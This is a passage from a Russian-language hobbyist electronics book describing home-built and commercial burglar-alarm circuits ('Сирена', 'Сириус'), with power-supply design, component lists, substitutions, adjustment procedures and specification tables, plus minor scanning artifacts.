При изготовлении трансформатора необходимо особое внимание уделить укладке обмоточного провода, которая должна быть рядовой, виток к витку, без накладок и перехлестов и с обязательной изоляцией каждого слоя нитролаком и тонкой фторопластовой пленкой с большим электрическим сопротивлением, можно также конденсаторной бумагой. Второй и последующие слои наматываются также рядами с выводом концов обмоточного провода через боковую стенку каркаса катушки в одну сторону. После сборки трансформатор должен быть закрыт защитным кожухом.

Выпрямительное устройство состоит из четырех полупроводниковых диодов и конденсаторов С1—С4. Конденсатор С1, как было указано выше, защищает устройство от сетевых помех, С2 сглаживает пульсации выпрямленного напряжения постоянного тока, СЗ обеспечивает снижение шума ППП, а С4, установленный на выходе стабилизатора напряжения и включенный параллельно нагрузке, снижает выходное сопротивление источника питания по переменному току.

В схеме электропитания на выходе выпрямителя собран стабилизатор напряжения компенсационного типа, выполненный на транзисторах VT1—VT4 и стабилитроне VD5. Регулирующим элементом стабилизатора является транзистор VT3. Опорное напряжение снимается со стабилизатора, выполненного по параметрической схеме на транзисторе VT1 и стабилитроне VD5, при этом транзистор является стабилизатором тока. Величина опорного напряжения при работе стабилизаторов сравнивается с выходным напряжением, которое снимается с резисторного ДН, собранного на постоянных резисторах R5, R6. Транзисторы VT2 и VT4 образуют дифференциальный усилитель тока. При сравнении токов опорного и выходного напряжений, которое осуществляется дифференциальным усилителем, через транзистор VT3 протекает ток, равный разности этих напряжений. Последовательно включенный стабилитрону VD5 резистор R1 обеспечивает четкий запуск компенсационного стабилизатора, когда в момент включения напряжение на выходе равно нулю.

После подачи сетевого напряжения на устройство в работу включается система электропитания, а сторожевые цепи электронной схемы переходят в дежурный режим.

Сторожевое устройство представляет собой быстродействующую систему, которая срабатывает, как и большинство подобных систем, как при замыкании контактов конечных выключателей или датчиков, так и при обрыве охранной линии.

В зависимости от выбранной конструкции устройства питание системы может обеспечиваться от автономного источника тока.

Подача сигнала тревоги при открывании двери или окна происходит по двухпроводной линии. В качестве датчиков используются малогабаритные переключатели ТВ2, которые могут быть включены параллельно в одну линию связи, составляющую сигнальный шлейф. В устройстве применено довольно большое количество переключателей и контактных групп, которые управляют автоматикой сигнального блока. Как было отмечено ранее, переключатель S1 предназначен для включения электропитания переменного тока; переключатель S2 включает и выключает питание звонка ВА1. В положении, указанном на схеме, электрический звонок включен и звуковой сигнал будет подан, если сработает автоматика устройства. Двухполюсный переключатель S3 предназначен для общего отключения звуковой и световой сигнализации. Переключатель S4 переводит сигнальное устройство в ждущий режим работы из положения холостого хода. Переключатели S5 и S6 устанавливаются на входных дверях, окнах, форточках, воротах гаражей и т. д., они составляют охранный шлейф и являются конечными выключателями.

При открывании дверей охраняемого объекта контакты 1 и 2 переключателя S5 (или S6) замыкаются и система переходит в рабочий режим тревоги. В положениях контактов всех переключателей, указанных на схеме, сторожевое устройство отключено от сети и находится в нерабочем состоянии. При подаче напряжения переменного тока на вход устройства и при условии, если вся система исправна, а двери закрыты (конечные выключатели S5, S6 разомкнуты), схема находится в дежурном режиме. В это время тиристор VS1 и стабилитрон VD7 закрыты и напряжение па исполнительные устройства не подается. Транзистор VT5 открыт, а на резисторе R10 фиксируется напряжение до 3 В, которого становится достаточно для поддержания в открытом состоянии этого транзистора. На базу транзистора VT6 подается небольшое положительное напряжение.

После замыкания контактов переключателя S5 падение напряжения на резисторе R10 значительно возрастает, что приводит к открыванию стабилитрона VD7 и тиристора VS1. Это, в свою очередь, обеспечивает срабатывание реле К1, контакты которого К1.1 и К1.2 переключаются из открытого состояния в замкнутое. Одновременно срабатывает световая и звуковая сигнализация, которые продолжают работать и после того, как контакты 1 и 2 переключателя S5 будут вновь разомкнуты, то есть дверь будет снова закрыта.

При изготовлении электронного блока устройства необходимо предусмотреть возможность размещения ручек управления, кнопок переключателей и индикаторных ламп на лицевой панели. Электрический звонок и сигнальная лампа могут быть расположены на значительном расстоянии от пульта управления и установлены вне охраняемого помещения. При этом параллельно могут быть установлены несколько таких сигнализаторов в разных местах. Электропитание их осуществляется по двухпроводным линиям, выполненным изолированным проводом.

Для изготовления сторожевого устройства применены следующие покупные комплектующие ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания Т1 типа ТА62-127/220-50;

транзисторы VT1 типа ГТ308В, VT2 — КТ315Б, VT3 — КТ814Б, VT4 — КТ315Б, VT5 — КТ603Б, VT6 — КТ603Б; выпрямительные диоды VD1—VD4 типа Д223, VD6 — Д224, VD8 — Д223, VD9 — Д223; стабилитроны VD5 типа Д814Д, VD7 — КС156А;

тиристор VS1 типа КУ102А; конденсаторы С1 типа К40У-9-630В-0.033 мкФ, С2 — К50-12-25В-500 мкФ, СЗ — К50-12-25В-20 мкф, С4 — К50-12-25В-100 мкФ, С5 — К50-12-25В-5 мкФ; резисторы R1 типа МЛТ-0,125-300 кОм, R2 — МЛТ-0,25-100 Ом, R3 — МЛТ-0,25-1,8 кОм, R4 — МЛТ-0,25-5,1 кОм, R5 — СПЗ-4аМ-А-0,25Вт-3,3 кОм, R6 — МЛТ-0,25-2 кОм, R7 — МЛТ-0,125-560 кОм, R8 — МЛТ-2-100 Ом, R9 — МЛТ-0,25-6,8 кОм, R10 — МЛТ-0,25-1 кОм, R11 — МЛТ-0,25-3,6 кОм, R12 — МЛТ-0,5-9,1 кОм, R 13 — МЛТ-0,5-1 кОм, R14 — МЛТ-0,5-68 кОм, RI5 — МЛТ-0,25-68 кОм, R16 — МЛТ-2-39 кОм; сигнальные лампы H1 типа ТН-30-3, Н2 — СМ37; электромагнитное реле К1 типа РЭС-9 (паспорт РС4.524.200); электрический звонок постоянного тока ВА1 напряжением питания до 24 В; электрические соединители X1 типа «вилка», Х2, ХЗ — КМЗ-1; переключатели S1 типа ТВ2-1-2, S2 — П1Т-1-1, S3 — МТЗ-1 (П2Т-1-1), S4 — ТВ2-1-2,S5 — ТВ2-1-2, S6 — ТВ2-1-2; предохранитель F1 типа ПМ1 1-0,25 А.

При изготовлении и регулировке сторожевого устройства можно использовать другие ЭРИ и ЭРЭ, аналогичные примененным и не ухудшающие основные электрические параметры и эксплуатационные характеристики. Например, сетевой понижающий трансформатор типа ТА можно заменить на трансформатор типа ТС-50-5 или трансформатор самодельной конструкции; выпрямительные диоды типа Д223, входящие в мостовой выпрямитель, можно заменить диодной сборкой типа КЦ или на выпрямительные диоды, рассчитанные на выпрямленный ток не менее 50 мА и обратное напряжение не ниже 50 В; транзисторы КТ315Б могут быть заменены транзисторами этой же серии с буквенными индексами В, Г, Е; резисторы типа МЛТ можно заменить на резисторы типов МТ, ВС, ВСа, ОМЛТ, УЛИ, БП, C1-4, C2-8; конденсаторы типа К50-12 — на К50-3, К50-6, К50-16, К50-20; транзисторы типа КТ603Б — на КТ605, П307, П308, П309 с любыми буквенными индексами; тиристор типа КУ102А — на КУ101 или КУ102 с любыми буквенными индексами. Для переключения рабочих состояний устройства вместо указанных выше могут быть применены переключатели типа П2К с фиксированным положением кнопки.

Регулировку сторожевого устройства начинают с проверки источника электропитания, устанавливая в него заведомо исправные и качественные ЭРИ и ЭРЭ. Сначала проверяется действующее напряжение на выходных обмотках сетевого трансформатора, далее — на выходе выпрямительного моста и затем в точках А и Б — на выходе стабилизатора напряжения. При проверке БП нагрузка в точках А и Б отключается и вместо нее к выходу подключается проволочный постоянный резистор типа ПЭВ (С5-35В) сопротивлением 250 Ом и мощностью 5 Вт. Подстроечным переменным резистором R5 устанавливается на этом резисторе постоянное напряжение 16 В. Затем нужно подключить осциллограф, и подбором резистора R7 добиваются минимальной амплитуды пульсации постоянного тока. Ток нагрузки должен быть не более 2 А. После этого подключается нагрузка и проверяется электронный блок при выключенных контактах переключателей. Сначала подбором сопротивления резистора R12 устанавливают на эмиттере транзистора VT6 напряжение 3 В, при этом на транзисторе V15 должно быть напряжение 0,5 В и он должен быть открыт.

Далее контакты 1 и 2 переключателя S7 замыкаются, то есть устройство переводится в положение «включено». При этом напряжение на стабилитроне VD7 относительно «земли» должно равняться 24 В. Тиристор и этот стабилитрон находятся в открытом состоянии, и, следовательно, индикаторная лампа Н2 должна светиться.

Основные электрические параметры

и технические характеристики сторожевого устройства на ППП

со световой и звуковой сигнализацией

Номинальное напряжение питающей сети

переменного тока, В .......... ....... 220 или 127

Номинальная частота питающей сети

переменного тока, Гц ................... 50

Номинальное напряжение автономного источника

питания постоянного тока, подключаемого

к системе в точках А и Б, В ............... 24

Пределы изменения напряжения питающей сети

переменного тока, %.................... —10...+10

Пределы изменения частоты питающей сети

переменного тока, %.................... 1

Пределы изменения напряжения автономного

источника питания постоянного тока, В ....... 20...24

Напряжение переменного тока на выводах

сетевого трансформатора Т1, В

11 и 12 ........................... 56

13 и 14 ........................... 56

15 и 16 .......................... 40

17 и 18 ........................... 40

19 и 20 ........................... 12

21 и 22 ........................... 10

Стабилизированное напряжение на выходе в точках

А и К, В ............................ 22

Амплитуда пульсации выпрямленного напряжения,

мВ, не более ......................... 16

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более ............. 12

Коэффициент стабилизации напряжения питающей

сети, не менее ........................ 200

Максимальное сопротивление шлейфа, кОм ...... 3

Количество одновременно охраняемых объектов, шт . . 1...10 Сопротивление изоляции токоведущих проводников

относительно металлических частей устройства,

МОм,не менее ....................... 10

Ток, потребляемый устройством в дежурном режиме

работы, мА, не более ................... 7

Общая максимальная мощность устройства, Вт .... 36 Мощность потребляемая устройством в дежурном

режиме работы,мВт .................... 150

Помехозащищенность устройства при воздействии внешнего электромагнитного поля, дБ, не менее . . 100 Срок службы, ч, не менее .................. 10 000

Вероятность безотказной работы при риске заказчика в=0,92, не менее ............... 0,96

кпд, %,не менее ........................ 95

Условия эксплуатации:

температура окружающей среды, °С ........ —25...-+-40

относительная влажность воздухапри температуре25 С %, не более ................... 85

атмосферное давление воздуха, мм рт. ст. ..... 200...900

t41.jpg

Рис. 3.9. Принципиальная схема сторожевого устройства на ППП со световой и звуковой сигнализацией.

Рис. 3.9. Принципиальная схема сторожевого устройства на ППП со световой и звуковой сигнализацией.

Изображение: 

Таблица 3.11. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сторожевом устройстве на ППП со све

Изображение: 

3. 6. Система предупредительной сигнализации

3. 6. СИСТЕМА ПРЕДУПРЕДИТЕЛЬНОЙ СИГНАЛИЗАЦИИ

Электронная автоматическая система промышленного изготовления типа «Сирена» предназначена для подачи сигнала тревоги при проникновении на охраняемые объекты посторонних лиц и при срабатывании установленных на объектах специальных датчиков, выполняющих роль конечных выключателей. Рассматриваемое устройство имеет универсальное применение, так как рассчитано на использование во всех климатических зонах страны для охраны как стационарных, так и подвижных объектов.

Наилучшие результаты при применении устройства предупредительной сигнализации типа «Сирена» можно получить, если использовать его в комплексных системах охраны и оповещения совместно с другими электронными и электромеханическими устройствами, и особенно при охране стационарных объектов.

Примерная схема размещения датчиков в контрольных точках охраняемых объектов приведена на рис. 3. 10. Электрическая схема, включающая комплект блоков и самостоятельных узлов, которые образуют систему, предусматривает возможность подключения к соответствующим клеммам не менее четырех датчиков. С их помощью осуществляется наблюдение и охрана как помещения в целом, так и отдельных его частей или нескольких близко расположенных объектов одновременно.

В схеме, приведенной на рис. 3. 10, приняты следующие обозначения; светодиод VD1 типа АЛ307Б; датчики Д1— Д4, конструкции которых даны в главе 3. 2; однополюсный переключатель S1 типа «тумблер»; перемычка X1 прово-

3-61.jpg

Рис. 3. 10. Схема размещения датчиков в контрольных точках охраняемых объектов.

лочная , блок громкоговорителей (БГ); БЭ; сигнальная лампа H1.

Работает система предупредительной сигнализации, как правило, в автономном режиме, от восьми последовательно соединенных элементов типа 373, устанавливаемых в специальный отсек БП. Данная система сигнализации может быть легко переведена на электропитание от сети переменного тока напряжением 220 В частотой 50Гц. Для этого необходимо использовать покупной или самодельный блок электропитания с выходным стабилизированным напряжением 10...12 В и током нагрузки не менее 500мА, принципиальная электрическая схема которого приведена на рис. 3.11. Подключается БП к клеммам 4 и 6 электронного блока системы.

Следует сказать, что в соответствии с рекомендациями завода-изготовителя допускается использовать в качестве встроенного источника электропитания элементы, приведенные в табл. 3.1, или аккумуляторы типа НКТЦ-35-1, а также другие аналогичные им по техническим характеристикам и размерам. Хорошие результаты дает применение аккумуляторной батареи типа 8НКГ-10Г, которая сохраняет работоспособность в очень жестких условиях эксплуатации и обладает повышенными техническими характеристиками, надежностью и долговечностью.

С целью сохранения секретности промышленных изделии данной системы БЭ при установке на место не вскрывается и весь электромонтаж производится наружными соединениями к контактам, выведенным на лицевую панель БЭ. При этом принцип работы БЭ сторожевого устройства не поддается определению из-за отсутствия принципиальной и монтажной электрических схем. И как указывалось ранее, из-за отсутствия комплекта КД эти изделия не могут быть отремонтированы в домашней лаборатории.

Конструктивно основной электронный блок сторожевого устройства выполнен в виде прямоугольного пластмассового корпуса, который имеет габаритные размеры, не превышающие 185Х110Х70 мм. Размеры сетевого блока электропитания определяются в основном конструкцией примененного в ней понижающего трансформатора питания Т1 и не превышают следующих данных 120Х80Х70 мм. На лицевой панели БЭ установлены все основные органы управления и контактные клеммы, которые служат для подключения к ним монтажных проводников, идущих от датчиков. Эти клеммы имеют соответствующие обозначения.

К контактам 2 и 3 подключается скрытно устанавливаемый выключатель S1. Он должен быть недоступен посторонним лицам. Внешний источник питания, работающий автономно или от сети переменного тока, подключается к клеммам 4 и б (4 и 5). При этом на клемму 4 подается напряжение постоянного тока с положительного (плюсового) контакта, а на клемму б — с отрицательного (минусового). На выходных клеммах 1 и 2 действует напряжение питания со знаком «+» так же, как и на клеммах 4. К клеммам 5 и 10 подключается обрывной шлейф, выполненный из тонкого медного провода. К клеммам 13 и 14 — сирена или блок громкоговорителей. Шлейф-датчик подключается к клемме 10 (+) и к одному из минусовых выводов.

На лицевой панели БП устанавливаются ручки управления, держатели предохранителей, выходные клеммы и индикаторная лампа H1, а также светодиод VD2. Элементы БП собираются на печатной плате, изготавливаемой из фольгированного стеклотекстолита толщиной до 2 мм. Как видно из принципиальной схемы (рис. 3.11), БП включает в свой состав входные питающие цепи, сетевой понижающий трансформатор Т1, выпрямительное устройство, собранное на полупроводниковых диодах и электролитических конденсаторах, стабилизатор напряжения и выходные цепи.

Подключение БП к сети переменного тока осуществляется с помощью электрического соединителя X1 типа «вилка» к унифицированной розетке. Общее включение электропитания обеспечивается переключателем S1 типа «тумблер». Предохранители F1 и F2 защищают входные цепи БП от коротких замыканий и перегрузок.

На входе БП собран световой сигнализатор изменения сетевого напряжения на светодиоде VD2 и световой сигнализатор о подаче напряжения на сторожевое устройство на лампе H1 Первый сигнализатор работает только в том случае, если напряжение переменного тока превысит значение 235...240 В, в этом случае светодиод начинает светиться в мигающем режиме. Лампа накаливания H1 работает постоянно, пока замкнуты контакты переключателя S1. Ее равномерное свечение свидетельствует о том, что напряжение сети находится в пределах номинальных значений и на выходных обмотках трансформатора действует расчетное напряжение. Первый сигнализатор начнет работать в мигающем режиме только в том случае, если напряжение питающей сети превысит номинальное значение. Основой этого сигнализатора является динистор VS1, который срабатывает в следующем порядке. После замыкания контактов переключателя S1 сетевое напряжение поступает на однополупериодный выпрямитель, собранный на полупроводниковом диоде VD1, выпрямляется и подается через резистор R1 на ДН. С движка переменного резистора R2 часть напряжения поступает на электролитический конденсатор С1, который начинает заряжаться. До тех пор, пока напряжение на этом конденсаторе не достигнет напряжения пробоя динистора, последний находится в закрытом состоянии. В момент достижения повышенного значения напряжения динистор пробивается и конденсатор С1 разряжается через него и последовательно соединенные с ним резистор R4 и светодиод VD2, который вспыхивает. Затем конденсатор опять заряжается, после чего процесс повторяется снова. Так происходит постоянно до тех пор, пока напряжение в сети не снизится до предельных оптимальных значений. Работает этот сигнализатор в независимом режиме.

Блок питания подключается к БЭ электрическими соединителями Х2 и ХЗ. При этом соединитель Х2 подключается к клеммам 5 или 6, а ХЗ — к клемме 4 электронного блока. Здесь необходимо сделать предупреждение. БП, выполненный в металлическом корпусе, не должен иметь гальванической связи с системой предупредительной сигнализации, так как его корпус может иметь положительный потенциал.

В БП применен унифицированный сетевой трансформатор питания серии «Габарит», который рассчитан на подключение к сети переменного тока напряжением 127 или 220 В частотой 50 Гц. Вместо покупного трансформатора может быть применен самодельный трансформатор, который изготавливается на броневом магнитопроводе типа Ш или ШЛ (ШЛМ). Особое внимание следует обратить на сопротивление изоляции между витками обмоток трансформатора и магнитопроводом. Чем выше сопротивление, тем больше электрическая прочность и тем надежнее эксплуатация такого трансформатора. В домашней мастерской это достигается довольно простым способом. При рядовой намотке каждый слой провода покрывается нитролаком и высушивается в течение 2 ч. Между слоями обмотки прокладывается слой конденсаторной бумаги, который также покрывается изоляционным лаком. Каждая обмотка трансформатора, в том числе и экранная, должна быть также разделена слоем изоляционного материала, но с большим коэффициентом магнитной проницаемости. Очень хорошие результаты можно получить, если после полного изготовления весь трансформатор залить в форму эпоксидной смолой. Перед этой операцией выводные клеммы должны быть облужены припоем марки ПОС-60.

Сетевой понижающий трансформатор TI обеспечивает заданное выходное напряжение, поступающее на выпрямитель, полную гальваническую развязку входных цепей и сети переменного тока от вторичных электрических цепей схемы и достаточную электробезопасность при настройке и ремонте устройства предупредительной сигнализации.

Трансформатор Т1 имеет одну катушку, установленную на центральном стержне магнитопровода с активной площадью поперечного сечения стали не менее 6 см2. Моточные данные сетевого понижающего трансформатора питания самодельной конструкции приведены в табл. 3.12. На выходных обмотках трансформатора действует переменное напряжение 12 В при номинальной нагрузке.

Таблица 3.12. Моточные данные сетевого понижающего трансформатора питания T1, примененного в системе предупредительной сигнализации

3-62.jpg

Выпрямитель собран на четырех полупроводниковых диодах VD3—VD6 по однофазной двухполупериодной мостовой схеме, которая характеризуется высокими электрическими параметрами. На выходе выпрямителя действует постоянный ток с повышенной частотой пульсации. Выпрямитель имеет высокий кпд, удобен для электрического монтажа, не требует предохранительных прокладок при установке, защищает включенные в него полупроводниковые диоды от механических повреждений, на них действует пониженное обратное напряжение, и сама схема позволяет полнее использовать имеющуюся габаритную мощность сетевого трансформатора.

Выпрямленное напряжение постоянного тока 12...15 В поступает на компенсационный стабилизатор напряжения, собранный на транзисторах VT1—VT3. В качестве РЭ применен мощный транзистор VT1. Ток ограничения определяется величиной сопротивления резистора R8. При сборке и монтаже стабилизатора необходимо выполнить условие, при котором суммарное напряжение стабилизации в цепях полупроводниковых стабилитронов было бы равно примерно 11...12 В. Здесь необходимо учитывать также, что при увеличении тока нагрузки напряжение на входе стабилизатора уменьшается: и тем больше, если меньше габаритная мощность трансформатора.

При изготовлении БП и установке системы сигнализации на конкретном объекте используются следующие покупные комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа КТ803А, V'Т2 — КТ815В, VТ3-КT814B; выпрямительные диоды VD1 типа Д226Б, VD3-VD6—105А; стабилитроны VD7 типа Д815Д, VD8 — Д815Д, VD9 - Д814Д, VD10 — Д814Д, VD11 Д815Д; динистор VS1 типа КН102Д; конденсаторы С1 типа К73-11-1608-0,033 мкФ, С2 — К50-6-25В-4000 мкФ, СЗ — К.10-7В-25В-П33-100 нФ, С4 — К50-6-25В-6.8 мкФ; резисторы RI типа ВСа-0,5-47 кОм, R2 — СП4-2Ма-0,5Вт-100 кОм, R3 — ВСа-0,5-10 кОм, R4 — ВСа-0,25-10 Ом, R5 — ВСа-0,25-110 Ом, R6 — ВСа-0,5-680 Ом, R7 — ВСа-0,5 330 Ом, R8 — ВСа-0,5-2,7 кОм, R9 — ВСа-0,25-2,7 кОм, R 10 — СП4-2Ма-1Вт-1 кОм;

электрические соединители X1 типа <<вилка», Х2, ХЗ — КМЗ-1;

светодиод VD2 типа АЛ107Б; предохранители плавкие F1, F2 типа ПМ 1-0,5 A, F3 — ПМ 1-0,25 А; переключатель двухполюсный S1 типа П2Т-1-1; сигнальная лампа H1 типа МН- 6.3-0,22 A.

Система предупредительной сигнализации дает возможность подключить к ней дополнительно индикаторную лампу, работающую постоянно в мигающем режиме, аккумулятор автомобильного типа и звуковую сирену типа С205-6. Схема подключения этих устройств приведена на рис. 3.12. При монтаже дополнительных устройств применены следующие комплектующие ЭРЭ: транзисторы VT1 типа КТ315Б, VT2 — КТ819А; электромагнитное реле К7 типа РЭН-34 (паспорт ХП4.500.030-01); сирена ВА1 типа С205-6; аккумуляторная батарея GB1 с напряжением постоянного тока 12 В.

В качестве датчиков, устанавливаемых на дверях, окнах, капотах, воротах и т. д., применяются малогабаритные переключатели типа КМ1-1, выключатели типа МТ-1, переключатели типа П2К. Для монтажа используется провод марки МГШВ с площадью поперечного сечения по меди от 0,2 до 0,4 мм2.

Схемы подключения датчиков и дополнительных устройств приведены на рис. 3.10 и 3.12. Необходимо отметить, что к контактам 1 и 5 или 1 и 6 подключается датчик, устанавливаемый на входных дверях, так как система обеспечивает при этом задержку на выдачу звукового сигнала на 10 с. Этого времени хватает на то, чтобы отключить систему от питания при входе в помещение или охраняемый объект выключателем S1, скрытно установленным в укромном месте, что позволяет избежать подачи сигнала тревоги. К контактам 7 или 9, 5 или 6

3-63.jpg

Рис. 3.12. Схема подключения звуковой сирены к электронному блоку системы предупредительной сигнализации.

подключаются датчики, устанавливаемые на окнах, форточках, внутренних дверях и других открывающихся объектах, когда необходимо подать сигнал тревоги немедленно.

К контактам 10 и 5 или 10 и 6 подключаются проводники шлейфа, уложенного по периметру охраняемого помещения или территории. Проводники шлейфа могут быть наклеены на стекла окон. Шлейф выполняется из тонкого провода, металлической фольги или комбинированного токопроводящего материала. Обрыв проводников шлейфа приводит к мгновенному срабатыванию системы. При указанном включении шлейфа бывают случаи ложного срабатывания. Для предотвращения ложных срабатываний тогда, когда не применяется в качестве датчика шлейф, необходимо установить перемычки, замыкающие все три выходных контакта 5, 6 и 10 между собой.

К контактам 13 и 14 подключается акустическое устройство, входящее в комплект поставки системы. Как правило, на охраняемом объекте устанавливается один датчик на входной двери Д3 (см. рис. 3.10) и могут быть установлены параллельно друг другу датчики Д1, Д2 в количестве до 24 шт. При подключении датчика-шлейфа Д4 между контактами 6 и 10 не должно быть металлической перемычки. Установка датчиков в автомобиле и подключение системы предупредительной сигнализации типа «Сирена» к аккумулятору изложены в руководстве по эксплуатации.

Правильно собранная охранная сигнальная система в дополнительной наладке и регулировке не нуждается. Однако при сборке и монтаже элементов БП необходимо:

проверить выходное напряжение на вторичных обмотках сетевого трансформатора, поступающее на выпрямитель в режиме холостого хода; оно должно быть равно 12...13 В;

проверить вольтметром выпрямленное напряжение постоянного тока в контрольных точках А и Б как в режиме ожидания, так и под нагрузкой при подаче звукового и светового сигналов;

проверить выходное стабилизированное напряжение постоянного тока на электрических соединителях Х2 и ХЗ (см. рис. 3.9), которое должно быть равно 12 В под нагрузкой и до 14 В в режиме холостого хода.

В блоках системы можно применить другие комплектующие ЭРЭ, аналогичные по своим техническим характеристикам использованным. Так конденсаторы типа К50-3 можно заменить на конденсаторы типов К50-6, К50-12, К50-16, К50-20; резисторы типа ВСа — на ВС, МТ, МЛТ, ОМЛТ, С1-4; транзисторы типа КТ803А — на КТ819Б—КТ819Г; диод Д226Д — на КД102Б, Д237А, диоды типа Д105А — на Д226, Д237Б, КД105Б; могут быть применены также переключатели типа П2К.

Основные электрические параметры

и технические характеристики

системы предупредительной сигнализации типа «Сирена»

Номинальное напряжение питающей сети

переменного тока, В ..................... 220

Номинальное напряжение автономного источника

питания, В ......................... 12

Номинальная частота питающей сети

переменного тока, Гц ................... 50

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более ............. 12

Пределы изменения напряжения питающей сети

переменного тока, при которых сохраняется

устойчивая работа системы, В ............. 187...242

Пределы изменения напряжения автономного

источника питания, В ................... 9...14

Пределы изменения частоты питающей сети

переменного тока, Гц ................... 49...51

Максимальный ток нагрузки при питании от

автономного источника постоянного тока, мА . . . 500

Амплитуда пульсации выпрямленного напряжения, В,

не более ............................ 0,3

Коэффициент стабилизации напряжения постоянного

тока автономного источника электропитания,

не менее ............................ 300

Ток, потребляемый системой предупредительной

сигнализации в режиме холостого хода, мА,

не более ............................ 5

Уровень звукового давления сигнала тревоги

на расстоянии 1 м от источника. дБ . ....... 100

Koличество устанавливаемых на охраняемых на объекте

датчиков,шт ............... ....... 24

Длина шлейфа ,не менее ................. 100

Cопротивление шлейфа, кОм, не более ......... 5

Время срабатывания устройства при обрыве

шлейфа, мс, не более .................... 0,1

Время срабатывания устройства при размыкании

контактов датчиков, с, не менее ............. 2

Длительность звучания сигнала тревоги

после срабатывания системы, с, не менее ...... 500

Диаметр центральной жилы монтажного провода

в изоляции, соединяющего датчики с БЭ

устройства, мм, не менее ................. 0,2

Срок службы, ч, не менее .................. 5000

Срок гарантии, мес ...................... 24

Вероятность безотказной работы системы при риске

заказчика в=0,92, не менее ................ 0,95

Сопротивление изоляции токопроводящих частей

системы, МОм, не менее ................. 5

Условия эксплуатации:

температура окружающей среды, °С ........ —40...+45

относительная влажность воздуха при температуре 25 °С, %, не более ....... 85±3

атмосферное давление воздуха, мм рт. ст. ..... 200...900

t51.jpg

Рис. 3. 11. Принципиальная схема блока питания сторожевого устройства.

Рис. 3.10. Схема размещения датчиков в контрольных точках охраняемых объектов.

Изображение: 

Рис. 3.11. Принципиальная схема блока питания сторожевого устройства.

Изображение: 

Рис. 3.12. Схема подключения звуковой сирены к электронному блоку системы предупредительной сигнализации

Изображение: 

Таблица 3.12. Моточные данные сетевого понижающего трансформатора питания T1, примененного в системе предупредительной сигнализа

Изображение: 

3. 7. Универсальное электронное сторожевое устройство системы «Сириус»

3. 7. УНИВЕРСАЛЬНОЕ ЭЛЕКТРОННОЕ СТОРОЖЕВОЕ УСТРОЙСТВО СИСТЕМЫ «СИРИУС»

Универсальное сторожевое устройство состоит из сигнального устройства, БП с защитой, шифратора, дешифратора и ИМ. Устройство разработано для охраны помещений от пожара и несанкционированного открывания дверей, но использовать его целесообразно вместе с другими сторожевыми устройствами, которые имеют в своем составе звуковую и световую сигнализацию.

Электронное сторожевое устройство, собранное на ППП и трех ИМС, предназначено для установки в жилых домах и в хозяйственных помещениях для запирания дверей и отключения электропитания при повышении температуры окружающей среды выше установленной величины. Сторожевое устройство выполняет функции охраны без какой-либо сигнализации, является электронным прибором, в котором невозможно прослушать ход и порядок набора шифра и который внешне не реагирует на правильно или неправильно набранные промежуточные цифры шифра, а срабатывает исключительно после всего правильно набранного шифра. Важной особенностью данного устройства является то, что при наборе неправильной цифры время его срабатывания на открывание дверей постоянно увеличивается и даже правильно набранный шифр не дает команду на ИМ.

Сторожевое устройство может быть с успехом использовано как в городе, так и в сельской местности. Оно рассчитано на эксплуатацию в различных климатических районах страны, в условиях М, УХЛ и ХЛ. Устойчивую работу при температуре окружающей среды от —20 до 40 °С и относительной влажности до 90% при температуре 22 °С можно гарантировать, если для сборки и монтажа применены заведомо качественные комплектующие ЭРИ и ЭРЭ и правильно выполнены основные технологические операции сборки и монтажа.

Устройство может найти применение для охраны стационарных объектов на садово-огородных и приусадебных участках: домов, гаражей, хозблоков и т. д. Работает устройство от сети переменного тока напряжением 220 В частотой 50 Гц в постоянном режиме включения, о чем свидетельствует свечение неоновой лампы H1. Индикаторный светодиод вспыхивает только при правильно набранной девятой цифре шифра, набор которого осуществляется двумя рядом расположенными кнопочными переключателями, не имеющими фиксированного положения при замыкании контактов.

Принципиальная электрическая схема универсального сторожевого устройства приведена на рис. 3. 13. В полной зависимости от примененного в устройстве ИМ и напряжения его питания, которое определяет конструктивное исполнение, находится инженерное решение и техническое исполнение механической части замка, поэтому в схему могут быть внесены непринципиальные изменения. Так, если ИМ работает от источника постоянного тока, то из схемы исключаются входные и защитные цепи, и устройство может быть выполнено более компактным, но с несколько меньшими функциональными возможностями. Применение ИМ, работающего от сети переменного тока напряжением 220 В, делает сторожевое устройство более универсальным, в котором можно применять большое количество промышленных изделий: электромагнитов, соленоидов, электромагнитных реле и т. д.

Электронное сторожевое устройство отличается oт других устройств подобного назначения также тем, что оно работает непосредственно от сети переменного тока и не имеет в своем составе понижающего сетевого трансформатора питания, и, следовательно, схема сторожевого устройства не имеет трансформаторной гальванической развязки во входных цепях. Однако для гальванической развязки первичных цепей и электрической цепи защиты от схемы счетно-решающего устройства применен оптрон DU1, который одновременно служит устройством, повышающим электробезопасность всего РЭУ.

Как следует из схемы, сторожевое устройство включает в свой состав входные цепи питания, противопожарное охранное устройство, выпрямитель постоянного тока, емкостный фильтр, ПСН, счетно-решающее устройство, ИМ и выходные цепи.

Подключение электронного сторожевого устройства к сети переменного тока происходит с помощью стандартных электрического соединителя X1 типа «вилка» и штепсельной розетки. Предохранители F1 и F2 защищают входные цепи от коротких замыканий и перегрузок, они рассчитаны на ток максимальной перегрузки 1 А. Включение устройства в эксплуатацию осуществляется с помощью кнопочного или перекидного однополюсного переключателя S1.

Одним из основных блоков электронного устройства является устройство защиты от повышения температуры как окружающей среды в охраняемом помещении, так и от перегрева элементов электронной схемы, находящихся постоянно под напряжением высокого переменного тока. От этого зависит выбор места установки термодатчика. В данном случае при повышении температуры окружающей среды и температуры, действующей на термодатчик, предусмотрено отключение сторожевого устройства от сети переменного тока.

Устройство защиты применяется в многообразных вариантах во многих конструктивных исполнениях, в силу своей простоты не имеет принципиальной новизны, но достаточно эффективно работает с разными типами датчиков и в различных условиях эксплуатации.

В качестве главного элемента устройства защиты от пожара в данном случае использован маломощный транзистор VТ1, который является очень чувствительным датчиком температуры. Работает термодатчик по принципу увеличения обратного тока эмиттера при повышении температуры окружающей среды. Датчиками температуры могут служить полупроводниковые диоды и термосопротивления.

